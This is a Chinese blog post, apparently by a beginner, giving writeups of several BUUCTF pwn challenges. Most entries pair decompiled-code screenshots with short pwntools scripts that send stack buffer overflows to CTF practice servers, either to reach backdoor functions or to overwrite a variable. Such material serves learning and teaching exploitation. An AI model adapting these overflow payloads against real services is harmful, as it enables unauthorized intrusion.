buu_pwn

最新推荐文章于 2024-07-27 23:40:37 发布
最新推荐文章于 2024-07-27 23:40:37 发布
阅读量2k 收藏
点赞数 2
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52526329/article/details/120556210
版权

前言:只是一个在努力学习pwn的小菜狗,还请大佬们多多指正

warmup_csaw_2016

在这里插入图片描述明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d
在这里插入图片描述在这里插入图片描述

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sl=lambda x:io.sendline(x)

io=remote('node4.buuoj.cn',25851)

payload=bytes('a',encoding='utf8')*(0x40+8)+p64(0x40060d)
sl(payload)

io.interactive()

ciscn_2019_n_1

ciscn_2019_n_1func()
在这里插入图片描述没有必要进行溢出,只要覆盖到v2,让v2==11.28125就可以
在这里插入图片描述注意数值转换
请参考:浮点数在内存中如何表示

from pwn import *

p = remote('node4.buuoj.cn', 27536)
payload = bytes('a',encoding='utf8')*(0x30-0x04) + p32(0x41348000)

p.sendline(payload)
p.interactive()

pwn1_sctf_2016

在这里插入图片描述vuln()
在这里插入图片描述在这里插入图片描述后门函数
在这里插入图片描述

from pwn import *
p=remote('node4.buuoj.cn',26933)

payload=20*bytes('I',encoding='utf8')+4*bytes('A',encoding='utf8')+p32(0x8048F0D)

p.sendline(payload)
p.interactive()

参考文章
CTF(Pwn)32位文件 和 64 文件 的 差异
pwn1_sctf_2016

2021/10/04

jarvisoj_level0

在这里插入图片描述关于这道题。。。
因为ubuntu16的pwn环境没有配置好,有几个问题一直没有得到很好的解决,所以,在这里埋一颗种子,等待日后发芽。。。等到问题解决了,会专门写一篇文章记录一下环境配置过程中遇到的问题。
环境搭好了~~
ubuntu16 pwn环境搭建
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
寻找函数的返回地址在这里插入图片描述payload:

from pwn import *

p=remote('node4.buuoj.cn','29292')

payload=bytes('a',encoding='utf8')*(0x80+8)+p64(0x400596)
p.sendline(payload)
p.interactive()

在这里插入图片描述

ciscn_2019_c_1

在这里插入图片描述main()->encrypt()
在这里插入图片描述encrypt()

int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h]
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xFu;
      }
      else
      {
        s[x] ^= 0xEu;
      }
    }
    else
    {
      s[x] ^= 0xDu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

挖个坑。。。
去恶补一下基础知识。。

持续更新中。。。

是个笨笨
关注
专栏目录
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 657
写题笔记
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 592
Buu CTF PWN题ciscn_2019_c_1的WriteUp
BUU PWN(一)
playmaker的博客
01-28 2213
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
BUU-pwn(一)
Blazing-Angel的博客
04-24 350
rip 简单栈溢出,后门函数 exp from pwn import * #io=process("./pwn") r = remote('node4.buuoj.cn',25253) payload=b'a'*0xf+b'a'*0x08+p64(0x0401187) r.sendline(payload) r.interactive() warmup_csaw_2016 后门函数 int sub_40060D() 泄露地址 exp from pwn import * #io=process("./pw
BUU PWN (二)
playmaker的博客
02-07 884
BUU PWN (二) level0 from pwn import * #p=process('./level0') p=remote("node3.buuoj.cn","26684") p.recvline() payload='a'*0x80+'a'*8+p64(0x400596) p.sendline(payload) p.interactive() ciscn_2019_n_5 ret...
BUU-pwn(二)
Blazing-Angel的博客
04-27 341
ciscn_2019_n_8 32位程序,逻辑很简单 需要var[13] == 17 需要注意的是qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节 所以用p64 exp from pwn import * r = remote('node4.buuoj.cn',29396) payload = b'aaaa'*13+p64(0x11) r.sendline(p
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 390
Buu CTF PWN题jarvisoj_level0的WriteUp
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 436
Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1023
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUU-pwn(四)
Blazing-Angel的博客
09-04 196
BUU-pwn(四)
BUU-pwn(三)
Blazing-Angel的博客
06-19 307
pwn(三)
BUU刷题-Pwn-test
一个啥也不会的小菜鸡!
07-13 104
直接执行即可,获得主机权限!
buupwn1_sctf_2016
xieyichensss的博客
03-18 780
**(学生党太菜了)** pwn_sctf_2016 1.拿到文件,首先checksec并file一下。 发现NX打开了,哦 糟糕.不过不慌,我们下一步打开IDA看一哈 2.用32位的IDA打开他,反汇编一下。双击vuln()函数。 得到这一大堆我看不懂的东西,不过我看到最后有strcpy函数,知道是一个栈溢出的问题。s的大小为0h3c,且函数中出现I和you,着重分析他俩(经过一系列的百度)。得到最后是用you代替I,这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找,发现...
BUU刷题-Pwn-bjdctf_2020_babystack
一个啥也不会的小菜鸡!
06-21 260
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
pwn入门-buu刷题第三页题解(32道)(更新完毕,下一章见)
最新发布
2303_79366759的博客
07-27 1171
这个0x400A28的位置,然后程序就会根据我们rbp的值再加上一些偏移,赋值给rsi,最后实现往0x123000+偏移的地方写值,但是这里的0x38的字长,再加上偏移还是不够我们写orw,所以我们可以再执行一次read,来获取更多的字长,然后如果在调试时发现位置不对的话,可以通过nop滑梯滑到正确的地方执行orw。即可getshell。通过unlink,我们可以改变itemlist里面的值的内容,从而来改变show的位置,然后再泄露libc_base,然后由于这道题的got表还是可写的,那么随便打了。
pwn入门-buu刷题第二页题解(32道)(更新完毕,下一章见)
2303_79366759的博客
03-21 1131
通过控制返回地址来执行程序执行流的变化,也即是说我们并不是在执行我们写入在bss段的代码,因为真正的代码不是写作bss段的,应该位于text段。OK那我们接着讲,我们可以在s的地址里写入ret2libc的代码,然后执行它,泄露libc的基地址后再跳转回来,再用one_gadget来getshell,之前已经写过一道栈迁移的题目了,所以在这里就不多加赘述了。由代码易知,这个函数的功能是先搜索flag.txt文件,如果找到了则打印出来,如果没找到则退出程序,再看一下vuln函数里面有什么。
2024年最新pwn入门-buu第二页题解(32道)(持续更新中),网络安全研发岗面试复盘总结
2401_84254057的博客
05-06 987
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 711
buuctf pwn
2024年网络安全最新【算法学习】1929(1)
2401_84281698的博客
05-03 174
给你一个长度为 n 的整数数组 nums。具体而言,ans 由两个 nums 数组 串联 形成。返回数组 ans。
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值